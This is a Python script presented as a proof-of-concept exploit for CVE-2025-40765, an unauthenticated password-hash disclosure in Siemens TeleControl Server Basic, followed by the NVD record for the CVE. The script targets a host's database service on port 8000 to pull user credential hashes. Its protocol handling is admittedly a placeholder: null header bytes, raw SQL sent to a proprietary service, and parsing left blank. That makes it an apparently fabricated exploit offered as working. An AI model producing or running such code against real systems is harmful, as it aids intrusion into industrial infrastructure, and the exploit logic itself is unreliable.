CVE-2025-40765

# CVE-2025-40765 - Siemens TeleControl Server Basic Information Disclosure PoC # This PoC demonstrates how an unauthenticated attacker can retrieve # password hashes from the database service of TeleControl Server Basic V3.1 # Affected versions: >= V3.1.2.2 and < V3.1.2.3 import socket import struct import sys TARGET_HOST = "<target_ip>" TARGET_PORT = 8000 # Default port for TeleControl Server Basic DB service def build_exploit_request(): """ Build a crafted request to the database service to retrieve user password hashes without authentication. """ # Crafted protocol request to query user credentials table # The exact payload structure depends on the proprietary protocol # used by TeleControl Server Basic database service payload = b"\x00\x00\x00\x00" # Protocol header placeholder payload += b"SELECT username, password_hash FROM tcs_users;" # Length prefix length = struct.pack(">I", len(payload)) return length + payload def exploit(target_host, target_port): """ Send exploit request and receive password hashes. """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_host, target_port)) # Send crafted request request = build_exploit_request() sock.send(request) # Receive response containing password hashes response = sock.recv(4096) print(f"[*] Response received ({len(response)} bytes)") print(f"[*] Raw data: {response.hex()}") # Parse password hashes from response # ... (parsing logic depends on response format) sock.close() return response except Exception as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": if len(sys.argv) > 1: TARGET_HOST = sys.argv[1] print(f"[*] Targeting {TARGET_HOST}:{TARGET_PORT}") result = exploit(TARGET_HOST, TARGET_PORT) if result: print("[+] Exploit completed - password hashes may have been retrieved") else: print("[-] Exploit failed")

{"cve": {"id": "CVE-2025-40765", "sourceIdentifier": "[email protected]", "published": "2025-10-14T10:15:38.127", "lastModified": "2025-10-21T14:40:15.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in TeleControl Server Basic V3.1 (All versions >= V3.1.2.2 < V3.1.2.3). The affected application contains an information disclosure vulnerability. This could allow an unauthenticated remote attacker to obtain password hashes of users and to login to and perform authenticated operations of the database service."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:siemens:telecontrol_server_basic:3.1.2.2:*:*:*:*:*:*:*", "matchCriteriaId": "3FFBD445-E6F8-448C-8227-DC0580999FFE"}]}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-062309.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}